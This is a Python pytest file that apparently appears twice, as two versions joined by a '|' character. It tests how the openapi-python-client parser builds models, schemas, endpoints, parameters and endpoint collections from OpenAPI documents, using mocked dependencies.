assert generator_data == GeneratorError(
header="Failed to parse OpenAPI document",
detail=(
"2 validation errors for OpenAPI\n"
"info\n"
" field required (type=value_error.missing)\n"
"paths\n"
" field required (type=value_error.missing)"
),
)
Schemas.build.assert_not_called()
Schemas.assert_not_called()
class TestModel:
def test_from_data(self, mocker):
from openapi_python_client.parser.properties import Property
in_data = oai.Schema.construct(
title=mocker.MagicMock(),
description=mocker.MagicMock(),
required=["RequiredEnum"],
properties={"RequiredEnum": mocker.MagicMock(), "OptionalDateTime": mocker.MagicMock(),},
)
required_property = mocker.MagicMock(autospec=Property)
required_imports = mocker.MagicMock()
required_property.get_imports.return_value = {required_imports}
optional_property = mocker.MagicMock(autospec=Property)
optional_imports = mocker.MagicMock()
optional_property.get_imports.return_value = {optional_imports}
property_from_data = mocker.patch(
f"{MODULE_NAME}.property_from_data", side_effect=[required_property, optional_property],
)
from_ref = mocker.patch(f"{MODULE_NAME}.Reference.from_ref")
from openapi_python_client.parser.openapi import Model
result = Model.from_data(data=in_data, name=mocker.MagicMock())
from_ref.assert_called_once_with(in_data.title)
property_from_data.assert_has_calls(
[
mocker.call(name="RequiredEnum", required=True, data=in_data.properties["RequiredEnum"]),
mocker.call(name="OptionalDateTime", required=False, data=in_data.properties["OptionalDateTime"]),
]
)
required_property.get_imports.assert_called_once_with(prefix="")
optional_property.get_imports.assert_called_once_with(prefix="")
assert result == Model(
reference=from_ref(),
required_properties=[required_property],
optional_properties=[optional_property],
relative_imports={required_imports, optional_imports,},
description=in_data.description,
)
def test_from_data_property_parse_error(self, mocker):
in_data = oai.Schema.construct(
title=mocker.MagicMock(),
description=mocker.MagicMock(),
required=["RequiredEnum"],
properties={"RequiredEnum": mocker.MagicMock(), "OptionalDateTime": mocker.MagicMock(),},
)
parse_error = ParseError(data=mocker.MagicMock())
property_from_data = mocker.patch(f"{MODULE_NAME}.property_from_data", return_value=parse_error,)
from_ref = mocker.patch(f"{MODULE_NAME}.Reference.from_ref")
from openapi_python_client.parser.openapi import Model
result = Model.from_data(data=in_data, name=mocker.MagicMock())
from_ref.assert_called_once_with(in_data.title)
property_from_data.assert_called_once_with(
name="RequiredEnum", required=True, data=in_data.properties["RequiredEnum"]
)
assert result == parse_error
class TestSchemas:
def test_build(self, mocker):
from_data = mocker.patch(f"{MODULE_NAME}.Model.from_data")
in_data = {"1": mocker.MagicMock(enum=None), "2": mocker.MagicMock(enum=None), "3": mocker.MagicMock(enum=None)}
schema_1 = mocker.MagicMock()
schema_2 = mocker.MagicMock()
error = ParseError()
from_data.side_effect = [schema_1, schema_2, error]
from openapi_python_client.parser.openapi import Schemas
result = Schemas.build(schemas=in_data)
from_data.assert_has_calls([mocker.call(data=value, name=name) for (name, value) in in_data.items()])
assert result == Schemas(
models={schema_1.reference.class_name: schema_1, schema_2.reference.class_name: schema_2,}, errors=[error]
)
def test_build_parse_error_on_reference(self):
from openapi_python_client.parser.openapi import Schemas
ref_schema = oai.Reference.construct()
in_data = {1: ref_schema}
result = Schemas.build(schemas=in_data)
assert result.errors[0] == ParseError(data=ref_schema, detail="Reference schemas are not supported.")
def test_build_enums(self, mocker):
from openapi_python_client.parser.openapi import Schemas
from_data = mocker.patch(f"{MODULE_NAME}.Model.from_data")
enum_property = mocker.patch(f"{MODULE_NAME}.EnumProperty")
in_data = {"1": mocker.MagicMock(enum=["val1", "val2", "val3"])}
Schemas.build(schemas=in_data)
enum_property.assert_called()
from_data.assert_not_called()
class TestEndpoint:
def test_parse_request_form_body(self, mocker):
ref = mocker.MagicMock()
body = oai.RequestBody.construct(
content={
"application/x-www-form-urlencoded": oai.MediaType.construct(
media_type_schema=oai.Reference.construct(ref=ref)
)
}
)
from_ref = mocker.patch(f"{MODULE_NAME}.Reference.from_ref")
from openapi_python_client.parser.openapi import Endpoint
result = Endpoint.parse_request_form_body(body)
from_ref.assert_called_once_with(ref)
assert result == from_ref()
def test_parse_request_form_body_no_data(self):
body = oai.RequestBody.construct(content={})
from openapi_python_client.parser.openapi import Endpoint
result = Endpoint.parse_request_form_body(body)
assert result is None
def test_parse_multipart_body(self, mocker):
ref = mocker.MagicMock()
body = oai.RequestBody.construct(
content={"multipart/form-data": oai.MediaType.construct(media_type_schema=oai.Reference.construct(ref=ref))}
)
from_ref = mocker.patch(f"{MODULE_NAME}.Reference.from_ref")
from openapi_python_client.parser.openapi import Endpoint
result = Endpoint.parse_multipart_body(body)
from_ref.assert_called_once_with(ref)
assert result == from_ref()
def test_parse_multipart_body_no_data(self):
body = oai.RequestBody.construct(content={})
from openapi_python_client.parser.openapi import Endpoint
result = Endpoint.parse_multipart_body(body)
assert result is None
def test_parse_request_json_body(self, mocker):
schema = mocker.MagicMock()
body = oai.RequestBody.construct(
content={"application/json": oai.MediaType.construct(media_type_schema=schema)}
)
property_from_data = mocker.patch(f"{MODULE_NAME}.property_from_data")
from openapi_python_client.parser.openapi import Endpoint
result = Endpoint.parse_request_json_body(body)
property_from_data.assert_called_once_with("json_body", required=True, data=schema)
assert result == property_from_data()
def test_parse_request_json_body_no_data(self):
body = oai.RequestBody.construct(content={})
from openapi_python_client.parser.openapi import Endpoint
result = Endpoint.parse_request_json_body(body)
assert result is None
def test_add_body_no_data(self, mocker):
from openapi_python_client.parser.openapi import Endpoint
parse_request_form_body = mocker.patch.object(Endpoint, "parse_request_form_body")
endpoint = Endpoint(
path="path",
method="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
Endpoint._add_body(endpoint, oai.Operation.construct())
parse_request_form_body.assert_not_called()
def test_add_body_bad_data(self, mocker):
from openapi_python_client.parser.openapi import Endpoint
mocker.patch.object(Endpoint, "parse_request_form_body")
parse_error = ParseError(data=mocker.MagicMock())
mocker.patch.object(Endpoint, "parse_request_json_body", return_value=parse_error)
endpoint = Endpoint(
path="path",
method="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
request_body = mocker.MagicMock()
result = Endpoint._add_body(endpoint, oai.Operation.construct(requestBody=request_body))
assert result == ParseError(detail=f"cannot parse body of endpoint {endpoint.name}", data=parse_error.data)
def test_add_body_happy(self, mocker):
from openapi_python_client.parser.openapi import Endpoint, Reference
from openapi_python_client.parser.properties import Property
request_body = mocker.MagicMock()
form_body_reference = Reference.from_ref(ref="a")
multipart_body_reference = Reference.from_ref(ref="b")
parse_request_form_body = mocker.patch.object(
Endpoint, "parse_request_form_body", return_value=form_body_reference
)
parse_multipart_body = mocker.patch.object(
Endpoint, "parse_multipart_body", return_value=multipart_body_reference
)
json_body = mocker.MagicMock(autospec=Property)
json_body_imports = mocker.MagicMock()
json_body.get_imports.return_value = {json_body_imports}
parse_request_json_body = mocker.patch.object(Endpoint, "parse_request_json_body", return_value=json_body)
import_string_from_reference = mocker.patch(
f"{MODULE_NAME}.import_string_from_reference", side_effect=["import_1", "import_2"]
)
endpoint = Endpoint(
path="path",
method="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
endpoint = Endpoint._add_body(endpoint, oai.Operation.construct(requestBody=request_body))
parse_request_form_body.assert_called_once_with(request_body)
parse_request_json_body.assert_called_once_with(request_body)
parse_multipart_body.assert_called_once_with(request_body)
import_string_from_reference.assert_has_calls(
[
mocker.call(form_body_reference, prefix="..models"),
mocker.call(multipart_body_reference, prefix="..models"),
]
)
json_body.get_imports.assert_called_once_with(prefix="..models")
assert endpoint.relative_imports == {"import_1", "import_2", "import_3", json_body_imports}
assert endpoint.json_body == json_body
assert endpoint.form_body_reference == form_body_reference
assert endpoint.multipart_body_reference == multipart_body_reference
def test__add_responses_error(self, mocker):
from openapi_python_client.parser.openapi import Endpoint
response_1_data = mocker.MagicMock()
response_2_data = mocker.MagicMock()
data = {
"200": response_1_data,
"404": response_2_data,
}
endpoint = Endpoint(
path="path",
method="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
parse_error = ParseError(data=mocker.MagicMock())
response_from_data = mocker.patch(f"{MODULE_NAME}.response_from_data", return_value=parse_error)
response = Endpoint._add_responses(endpoint, data)
response_from_data.assert_called_once_with(status_code=200, data=response_1_data)
assert response == ParseError(
detail=f"cannot parse response of endpoint {endpoint.name}", data=parse_error.data
)
def test__add_responses(self, mocker):
from openapi_python_client.parser.openapi import Endpoint, Reference, RefResponse
response_1_data = mocker.MagicMock()
response_2_data = mocker.MagicMock()
data = {
"200": response_1_data,
"404": response_2_data,
}
endpoint = Endpoint(
path="path",
method="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
ref_1 = Reference.from_ref(ref="ref_1")
ref_2 = Reference.from_ref(ref="ref_2")
response_1 = RefResponse(status_code=200, reference=ref_1)
response_2 = RefResponse(status_code=404, reference=ref_2)
response_from_data = mocker.patch(f"{MODULE_NAME}.response_from_data", side_effect=[response_1, response_2])
import_string_from_reference = mocker.patch(
f"{MODULE_NAME}.import_string_from_reference", side_effect=["import_1", "import_2"]
)
endpoint = Endpoint._add_responses(endpoint, data)
response_from_data.assert_has_calls(
[mocker.call(status_code=200, data=response_1_data), mocker.call(status_code=404, data=response_2_data),]
)
import_string_from_reference.assert_has_calls(
[mocker.call(ref_1, prefix="..models"), mocker.call(ref_2, prefix="..models"),]
)
assert endpoint.responses == [response_1, response_2]
assert endpoint.relative_imports == {"import_1", "import_2", "import_3"}
def test__add_parameters_handles_no_params(self):
from openapi_python_client.parser.openapi import Endpoint
endpoint = Endpoint(
path="path", method="method", description=None, name="name", requires_security=False, tag="tag",
)
# Just checking there's no exception here
assert Endpoint._add_parameters(endpoint, oai.Operation.construct()) == endpoint
def test__add_parameters_parse_error(self, mocker):
from openapi_python_client.parser.openapi import Endpoint
endpoint = Endpoint(
path="path", method="method", description=None, name="name", requires_security=False, tag="tag",
)
parse_error = ParseError(data=mocker.MagicMock())
mocker.patch(f"{MODULE_NAME}.property_from_data", return_value=parse_error)
param = oai.Parameter.construct(name="test", required=True, param_schema=mocker.MagicMock(), param_in="cookie")
result = Endpoint._add_parameters(endpoint, oai.Operation.construct(parameters=[param]))
assert result == ParseError(data=parse_error.data, detail=f"cannot parse parameter of endpoint {endpoint.name}")
def test__add_parameters_fail_loudly_when_location_not_supported(self, mocker):
from openapi_python_client.parser.openapi import Endpoint
endpoint = Endpoint(
path="path", method="method", description=None, name="name", requires_security=False, tag="tag",
)
mocker.patch(f"{MODULE_NAME}.property_from_data")
param = oai.Parameter.construct(name="test", required=True, param_schema=mocker.MagicMock(), param_in="cookie")
result = Endpoint._add_parameters(endpoint, oai.Operation.construct(parameters=[param]))
assert result == ParseError(data=param, detail="Parameter must be declared in path or query")
def test__add_parameters_happy(self, mocker):
from openapi_python_client.parser.openapi import Endpoint
from openapi_python_client.parser.properties import Property
endpoint = Endpoint(
path="path",
method="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
path_prop = mocker.MagicMock(autospec=Property)
path_prop_import = mocker.MagicMock()
path_prop.get_imports = mocker.MagicMock(return_value={path_prop_import})
query_prop = mocker.MagicMock(autospec=Property)
query_prop_import = mocker.MagicMock()
query_prop.get_imports = mocker.MagicMock(return_value={query_prop_import})
header_prop = mocker.MagicMock(autospec=Property)
header_prop_import = mocker.MagicMock()
header_prop.get_imports = mocker.MagicMock(return_value={header_prop_import})
property_from_data = mocker.patch(
f"{MODULE_NAME}.property_from_data", side_effect=[path_prop, query_prop, header_prop]
)
path_schema = mocker.MagicMock()
query_schema = mocker.MagicMock()
header_schema = mocker.MagicMock()
data = oai.Operation.construct(
parameters=[
oai.Parameter.construct(
name="path_prop_name", required=True, param_schema=path_schema, param_in="path"
),
oai.Parameter.construct(
name="query_prop_name", required=False, param_schema=query_schema, param_in="query"
),
oai.Parameter.construct(
name="header_prop_name", required=False, param_schema=header_schema, param_in="header"
),
oai.Reference.construct(), # Should be ignored
oai.Parameter.construct(), # Should be ignored
]
)
endpoint = Endpoint._add_parameters(endpoint, data)
property_from_data.assert_has_calls(
[
mocker.call(name="path_prop_name", required=True, data=path_schema),
mocker.call(name="query_prop_name", required=False, data=query_schema),
mocker.call(name="header_prop_name", required=False, data=header_schema),
]
)
path_prop.get_imports.assert_called_once_with(prefix="..models")
query_prop.get_imports.assert_called_once_with(prefix="..models")
header_prop.get_imports.assert_called_once_with(prefix="..models")
assert endpoint.relative_imports == {"import_3", path_prop_import, query_prop_import, header_prop_import}
assert endpoint.path_parameters == [path_prop]
assert endpoint.query_parameters == [query_prop]
assert endpoint.header_parameters == [header_prop]
def test_from_data_bad_params(self, mocker):
from openapi_python_client.parser.openapi import Endpoint
path = mocker.MagicMock()
method = mocker.MagicMock()
parse_error = ParseError(data=mocker.MagicMock())
_add_parameters = mocker.patch.object(Endpoint, "_add_parameters", return_value=parse_error)
data = oai.Operation.construct(
description=mocker.MagicMock(),
operationId=mocker.MagicMock(),
security={"blah": "bloo"},
responses=mocker.MagicMock(),
)
result = Endpoint.from_data(data=data, path=path, method=method, tag="default")
assert result == parse_error
def test_from_data_bad_responses(self, mocker):
from openapi_python_client.parser.openapi import Endpoint
path = mocker.MagicMock()
method = mocker.MagicMock()
parse_error = ParseError(data=mocker.MagicMock())
_add_parameters = mocker.patch.object(Endpoint, "_add_parameters")
_add_responses = mocker.patch.object(Endpoint, "_add_responses", return_value=parse_error)
data = oai.Operation.construct(
description=mocker.MagicMock(),
operationId=mocker.MagicMock(),
security={"blah": "bloo"},
responses=mocker.MagicMock(),
)
result = Endpoint.from_data(data=data, path=path, method=method, tag="default")
assert result == parse_error
def test_from_data(self, mocker):
from openapi_python_client.parser.openapi import Endpoint
path = mocker.MagicMock()
method = mocker.MagicMock()
_add_parameters = mocker.patch.object(Endpoint, "_add_parameters")
_add_responses = mocker.patch.object(Endpoint, "_add_responses")
_add_body = mocker.patch.object(Endpoint, "_add_body")
data = oai.Operation.construct(
description=mocker.MagicMock(),
operationId=mocker.MagicMock(),
security={"blah": "bloo"},
responses=mocker.MagicMock(),
)
endpoint = Endpoint.from_data(data=data, path=path, method=method, tag="default")
assert endpoint == _add_body.return_value
_add_parameters.assert_called_once_with(
Endpoint(
path=path,
method=method,
description=data.description,
name=data.operationId,
requires_security=True,
tag="default",
),
data,
)
_add_responses.assert_called_once_with(_add_parameters.return_value, data.responses)
_add_body.assert_called_once_with(_add_responses.return_value, data)
data.security = None
_add_parameters.reset_mock()
Endpoint.from_data(data=data, path=path, method=method, tag="a")
_add_parameters.assert_called_once_with(
Endpoint(
path=path,
method=method,
description=data.description,
name=data.operationId,
requires_security=False,
tag="a",
),
data,
)
data.operationId = None
assert Endpoint.from_data(data=data, path=path, method=method, tag="a") == ParseError(
data=data, detail="Path operations with operationId are not yet supported"
)
class TestImportStringFromReference:
def test_import_string_from_reference_no_prefix(self, mocker):
from openapi_python_client.parser.openapi import import_string_from_reference
from openapi_python_client.parser.reference import Reference
reference = mocker.MagicMock(autospec=Reference)
result = import_string_from_reference(reference)
assert result == f"from .{reference.module_name} import {reference.class_name}"
def test_import_string_from_reference_with_prefix(self, mocker):
from openapi_python_client.parser.openapi import import_string_from_reference
from openapi_python_client.parser.reference import Reference
prefix = mocker.MagicMock(autospec=str)
reference = mocker.MagicMock(autospec=Reference)
result = import_string_from_reference(reference=reference, prefix=prefix)
assert result == f"from {prefix}.{reference.module_name} import {reference.class_name}"
class TestEndpointCollection:
def test_from_data(self, mocker):
from openapi_python_client.parser.openapi import Endpoint, EndpointCollection
path_1_put = oai.Operation.construct()
path_1_post = oai.Operation.construct(tags=["tag_2", "tag_3"])
path_2_get = oai.Operation.construct()
data = {
"path_1": oai.PathItem.construct(post=path_1_post, put=path_1_put),
"path_2": oai.PathItem.construct(get=path_2_get),
}
endpoint_1 = mocker.MagicMock(autospec=Endpoint, tag="default", relative_imports={"1", "2"})
endpoint_2 = mocker.MagicMock(autospec=Endpoint, tag="tag_2", relative_imports={"2"})
endpoint_3 = mocker.MagicMock(autospec=Endpoint, tag="default", relative_imports={"2", "3"})
endpoint_from_data = mocker.patch.object(
Endpoint, "from_data", side_effect=[endpoint_1, endpoint_2, endpoint_3]
)
result = EndpointCollection.from_data(data=data)
endpoint_from_data.assert_has_calls(
[
mocker.call(data=path_1_put, path="path_1", method="put", tag="default"),
mocker.call(data=path_1_post, path="path_1", method="post", tag="tag_2"),
mocker.call(data=path_2_get, path="path_2", method="get", tag="default"),
],
)
assert result == {
"default": EndpointCollection(
"default", endpoints=[endpoint_1, endpoint_3], relative_imports={"1", "2", "3"}
),
"tag_2": EndpointCollection("tag_2", endpoints=[endpoint_2], relative_imports={"2"}),
}
def test_from_data_errors(self, mocker):
from openapi_python_client.parser.openapi import Endpoint, EndpointCollection, ParseError
path_1_put = oai.Operation.construct()
path_1_post = oai.Operation.construct(tags=["tag_2", "tag_3"])
path_2_get = oai.Operation.construct()
data = {
"path_1": oai.PathItem.construct(post=path_1_post, put=path_1_put),
"path_2": oai.PathItem.construct(get=path_2_get),
}
endpoint_from_data = mocker.patch.object(
Endpoint, "from_data", side_effect=[ParseError(data="1"), ParseError(data="2"), ParseError(data="3")]
)
result = EndpointCollection.from_data(data=data)
endpoint_from_data.assert_has_calls(
[
mocker.call(data=path_1_put, path="path_1", method="put", tag="default"),
mocker.call(data=path_1_post, path="path_1", method="post", tag="tag_2"),
mocker.call(data=path_2_get, path="path_2", method="get", tag="default"),
],
)
assert result["default"].parse_errors[0].data == "1"
assert result["default"].parse_errors[1].data == "3"
assert result["tag_2"].parse_errors[0].data == "2"
| from pydantic import ValidationError
from pydantic.error_wrappers import ErrorWrapper
import openapi_python_client.schema as oai
from openapi_python_client import GeneratorError, utils
from openapi_python_client.parser.errors import ParseError
MODULE_NAME = "openapi_python_client.parser.openapi"
class TestGeneratorData:
def test_from_dict(self, mocker):
Schemas = mocker.patch(f"{MODULE_NAME}.Schemas")
EndpointCollection = mocker.patch(f"{MODULE_NAME}.EndpointCollection")
OpenAPI = mocker.patch(f"{MODULE_NAME}.oai.OpenAPI")
openapi = OpenAPI.parse_obj.return_value
in_dict = mocker.MagicMock()
get_all_enums = mocker.patch(f"{MODULE_NAME}.EnumProperty.get_all_enums")
from openapi_python_client.parser.openapi import GeneratorData
generator_data = GeneratorData.from_dict(in_dict)
OpenAPI.parse_obj.assert_called_once_with(in_dict)
Schemas.build.assert_called_once_with(schemas=openapi.components.schemas)
EndpointCollection.from_data.assert_called_once_with(data=openapi.paths)
get_all_enums.assert_called_once_with()
assert generator_data == GeneratorData(
title=openapi.info.title,
description=openapi.info.description,
version=openapi.info.version,
endpoint_collections_by_tag=EndpointCollection.from_data.return_value,
schemas=Schemas.build.return_value,
enums=get_all_enums.return_value,
)
# Test no components
openapi.components = None
Schemas.build.reset_mock()
generator_data = GeneratorData.from_dict(in_dict)
Schemas.build.assert_not_called()
assert generator_data.schemas == Schemas()
def test_from_dict_invalid_schema(self, mocker):
Schemas = mocker.patch(f"{MODULE_NAME}.Schemas")
in_dict = {}
from openapi_python_client.parser.openapi import GeneratorData
generator_data = GeneratorData.from_dict(in_dict)
assert generator_data == GeneratorError(
header="Failed to parse OpenAPI document",
detail=(
"2 validation errors for OpenAPI\n"
"info\n"
" field required (type=value_error.missing)\n"
"paths\n"
" field required (type=value_error.missing)"
),
)
Schemas.build.assert_not_called()
Schemas.assert_not_called()
class TestModel:
def test_from_data(self, mocker):
from openapi_python_client.parser.properties import Property
in_data = oai.Schema.construct(
title=mocker.MagicMock(),
description=mocker.MagicMock(),
required=["RequiredEnum"],
properties={"RequiredEnum": mocker.MagicMock(), "OptionalDateTime": mocker.MagicMock(),},
)
required_property = mocker.MagicMock(autospec=Property)
required_imports = mocker.MagicMock()
required_property.get_imports.return_value = {required_imports}
optional_property = mocker.MagicMock(autospec=Property)
optional_imports = mocker.MagicMock()
optional_property.get_imports.return_value = {optional_imports}
property_from_data = mocker.patch(
f"{MODULE_NAME}.property_from_data", side_effect=[required_property, optional_property],
)
from_ref = mocker.patch(f"{MODULE_NAME}.Reference.from_ref")
from openapi_python_client.parser.openapi import Model
result = Model.from_data(data=in_data, name=mocker.MagicMock())
from_ref.assert_called_once_with(in_data.title)
property_from_data.assert_has_calls(
[
mocker.call(name="RequiredEnum", required=True, data=in_data.properties["RequiredEnum"]),
mocker.call(name="OptionalDateTime", required=False, data=in_data.properties["OptionalDateTime"]),
]
)
required_property.get_imports.assert_called_once_with(prefix="")
optional_property.get_imports.assert_called_once_with(prefix="")
assert result == Model(
reference=from_ref(),
required_properties=[required_property],
optional_properties=[optional_property],
relative_imports={required_imports, optional_imports,},
description=in_data.description,
)
def test_from_data_property_parse_error(self, mocker):
in_data = oai.Schema.construct(
title=mocker.MagicMock(),
description=mocker.MagicMock(),
required=["RequiredEnum"],
properties={"RequiredEnum": mocker.MagicMock(), "OptionalDateTime": mocker.MagicMock(),},
)
parse_error = ParseError(data=mocker.MagicMock())
property_from_data = mocker.patch(f"{MODULE_NAME}.property_from_data", return_value=parse_error,)
from_ref = mocker.patch(f"{MODULE_NAME}.Reference.from_ref")
from openapi_python_client.parser.openapi import Model
result = Model.from_data(data=in_data, name=mocker.MagicMock())
from_ref.assert_called_once_with(in_data.title)
property_from_data.assert_called_once_with(
name="RequiredEnum", required=True, data=in_data.properties["RequiredEnum"]
)
assert result == parse_error
class TestSchemas:
def test_build(self, mocker):
from_data = mocker.patch(f"{MODULE_NAME}.Model.from_data")
in_data = {"1": mocker.MagicMock(enum=None), "2": mocker.MagicMock(enum=None), "3": mocker.MagicMock(enum=None)}
schema_1 = mocker.MagicMock()
schema_2 = mocker.MagicMock()
error = ParseError()
from_data.side_effect = [schema_1, schema_2, error]
from openapi_python_client.parser.openapi import Schemas
result = Schemas.build(schemas=in_data)
from_data.assert_has_calls([mocker.call(data=value, name=name) for (name, value) in in_data.items()])
assert result == Schemas(
models={schema_1.reference.class_name: schema_1, schema_2.reference.class_name: schema_2,}, errors=[error]
)
def test_build_parse_error_on_reference(self):
from openapi_python_client.parser.openapi import Schemas
ref_schema = oai.Reference.construct()
in_data = {1: ref_schema}
result = Schemas.build(schemas=in_data)
assert result.errors[0] == ParseError(data=ref_schema, detail="Reference schemas are not supported.")
def test_build_enums(self, mocker):
from openapi_python_client.parser.openapi import Schemas
from_data = mocker.patch(f"{MODULE_NAME}.Model.from_data")
enum_property = mocker.patch(f"{MODULE_NAME}.EnumProperty")
in_data = {"1": mocker.MagicMock(enum=["val1", "val2", "val3"])}
Schemas.build(schemas=in_data)
enum_property.assert_called()
from_data.assert_not_called()
class TestEndpoint:
def test_parse_request_form_body(self, mocker):
ref = mocker.MagicMock()
body = oai.RequestBody.construct(
content={
"application/x-www-form-urlencoded": oai.MediaType.construct(
media_type_schema=oai.Reference.construct(ref=ref)
)
}
)
from_ref = mocker.patch(f"{MODULE_NAME}.Reference.from_ref")
from openapi_python_client.parser.openapi import Endpoint
result = Endpoint.parse_request_form_body(body)
from_ref.assert_called_once_with(ref)
assert result == from_ref()
def test_parse_request_form_body_no_data(self):
body = oai.RequestBody.construct(content={})
from openapi_python_client.parser.openapi import Endpoint
result = Endpoint.parse_request_form_body(body)
assert result is None
def test_parse_multipart_body(self, mocker):
ref = mocker.MagicMock()
body = oai.RequestBody.construct(
content={"multipart/form-data": oai.MediaType.construct(media_type_schema=oai.Reference.construct(ref=ref))}
)
from_ref = mocker.patch(f"{MODULE_NAME}.Reference.from_ref")
from openapi_python_client.parser.openapi import Endpoint
result = Endpoint.parse_multipart_body(body)
from_ref.assert_called_once_with(ref)
assert result == from_ref()
def test_parse_multipart_body_no_data(self):
body = oai.RequestBody.construct(content={})
from openapi_python_client.parser.openapi import Endpoint
result = Endpoint.parse_multipart_body(body)
assert result is None
def test_parse_request_json_body(self, mocker):
schema = mocker.MagicMock()
body = oai.RequestBody.construct(
content={"application/json": oai.MediaType.construct(media_type_schema=schema)}
)
property_from_data = mocker.patch(f"{MODULE_NAME}.property_from_data")
from openapi_python_client.parser.openapi import Endpoint
result = Endpoint.parse_request_json_body(body)
property_from_data.assert_called_once_with("json_body", required=True, data=schema)
assert result == property_from_data()
def test_parse_request_json_body_no_data(self):
body = oai.RequestBody.construct(content={})
from openapi_python_client.parser.openapi import Endpoint
result = Endpoint.parse_request_json_body(body)
assert result is None
def test_add_body_no_data(self, mocker):
from openapi_python_client.parser.openapi import Endpoint
parse_request_form_body = mocker.patch.object(Endpoint, "parse_request_form_body")
endpoint = Endpoint(
path="path",
method="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
Endpoint._add_body(endpoint, oai.Operation.construct())
parse_request_form_body.assert_not_called()
def test_add_body_bad_data(self, mocker):
from openapi_python_client.parser.openapi import Endpoint
mocker.patch.object(Endpoint, "parse_request_form_body")
parse_error = ParseError(data=mocker.MagicMock())
mocker.patch.object(Endpoint, "parse_request_json_body", return_value=parse_error)
endpoint = Endpoint(
path="path",
method="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
request_body = mocker.MagicMock()
result = Endpoint._add_body(endpoint, oai.Operation.construct(requestBody=request_body))
assert result == ParseError(detail=f"cannot parse body of endpoint {endpoint.name}", data=parse_error.data)
def test_add_body_happy(self, mocker):
from openapi_python_client.parser.openapi import Endpoint, Reference
from openapi_python_client.parser.properties import Property
request_body = mocker.MagicMock()
form_body_reference = Reference.from_ref(ref="a")
multipart_body_reference = Reference.from_ref(ref="b")
parse_request_form_body = mocker.patch.object(
Endpoint, "parse_request_form_body", return_value=form_body_reference
)
parse_multipart_body = mocker.patch.object(
Endpoint, "parse_multipart_body", return_value=multipart_body_reference
)
json_body = mocker.MagicMock(autospec=Property)
json_body_imports = mocker.MagicMock()
json_body.get_imports.return_value = {json_body_imports}
parse_request_json_body = mocker.patch.object(Endpoint, "parse_request_json_body", return_value=json_body)
import_string_from_reference = mocker.patch(
f"{MODULE_NAME}.import_string_from_reference", side_effect=["import_1", "import_2"]
)
endpoint = Endpoint(
path="path",
method="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
endpoint = Endpoint._add_body(endpoint, oai.Operation.construct(requestBody=request_body))
parse_request_form_body.assert_called_once_with(request_body)
parse_request_json_body.assert_called_once_with(request_body)
parse_multipart_body.assert_called_once_with(request_body)
import_string_from_reference.assert_has_calls(
[
mocker.call(form_body_reference, prefix="..models"),
mocker.call(multipart_body_reference, prefix="..models"),
]
)
json_body.get_imports.assert_called_once_with(prefix="..models")
assert endpoint.relative_imports == {"import_1", "import_2", "import_3", json_body_imports}
assert endpoint.json_body == json_body
assert endpoint.form_body_reference == form_body_reference
assert endpoint.multipart_body_reference == multipart_body_reference
def test__add_responses_error(self, mocker):
from openapi_python_client.parser.openapi import Endpoint
response_1_data = mocker.MagicMock()
response_2_data = mocker.MagicMock()
data = {
"200": response_1_data,
"404": response_2_data,
}
endpoint = Endpoint(
path="path",
method="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
parse_error = ParseError(data=mocker.MagicMock())
response_from_data = mocker.patch(f"{MODULE_NAME}.response_from_data", return_value=parse_error)
response = Endpoint._add_responses(endpoint, data)
response_from_data.assert_called_once_with(status_code=200, data=response_1_data)
assert response == ParseError(
detail=f"cannot parse response of endpoint {endpoint.name}", data=parse_error.data
)
def test__add_responses(self, mocker):
from openapi_python_client.parser.openapi import Endpoint, Reference, RefResponse
response_1_data = mocker.MagicMock()
response_2_data = mocker.MagicMock()
data = {
"200": response_1_data,
"404": response_2_data,
}
endpoint = Endpoint(
path="path",
method="method",
description=None,
name="name",
requires_security=False,
tag="tag",
relative_imports={"import_3"},
)
ref_1 = Reference.from_ref(ref="ref_1")
ref_2 = Reference.from_ref(ref="ref_2")
response_1 = RefResponse(status_code=200, reference=ref_1)
response_2 = RefResponse(status_code=404, reference=ref_2)
response_from_data = mocker.patch(f"{MODULE_NAME}.response_from_data", side_effect=[response_1, response_2])
import_string_from_reference = mocker.patch(
f"{MODULE_NAME}.import_string_from_reference", side_effect=["import_1", "import_2"]
)
endpoint = Endpoint._add_responses(endpoint, data)
response_from_data.assert_has_calls(
[mocker.call(status_code=200, data=response_1_data), mocker.call(status_code=404, data=response_2_data),]
)
import_string_from_reference.assert_has_calls(
[mocker.call(ref_1, prefix="..models"), mocker.call(ref_2, prefix="..models"),]
)
assert endpoint.responses == [response_1, response_2]
assert endpoint.relative_imports == {"import_1", "import_2", "import_3"}
def test__add_parameters_handles_no_params(self):
from openapi_python_client.parser.openapi import Endpoint
endpoint = Endpoint(
path="path", method="method", description=None, name="name", requires_security=False, tag="tag",
)
# Just checking there's no exception here
assert Endpoint._add_parameters(endpoint, oai.Operation.construct()) == endpoint
def test__add_parameters_parse_error(self, mocker):
from openapi_python_client.parser.openapi import Endpoint
endpoint = Endpoint(
path="path", method="method", description=None, name="name", requires_security=False, tag="tag",
)
parse_error = ParseError(data=mocker.MagicMock())
mocker.patch(f"{MODULE_NAME}.property_from_data", return_value=parse_error)
param = oai.Parameter.construct(name="test", required=True, param_schema=mocker.MagicMock(), param_in="cookie")
result = Endpoint._add_parameters(endpoint, oai.Operation.construct(parameters=[param]))
assert result == ParseError(data=parse_error.data, detail=f"cannot parse parameter of endpoint {endpoint.name}")
def test__add_parameters_fail_loudly_when_location_not_supported(self, mocker):
from openapi_python_client.parser.openapi import Endpoint
endpoint = Endpoint(
path="path", method="method", description=None, name="name", requires_security=False, tag="tag",
)
mocker.patch(f"{MODULE_NAME}.property_from_data")
param = oai.Parameter.construct(name="test", required=True, param_schema=mocker.MagicMock(), param_in="cookie")
result = Endpoint._add_parameters(endpoint, oai.Operation.construct(parameters=[param]))
assert result == ParseError(data=param, detail="Parameter must be declared in path or query")
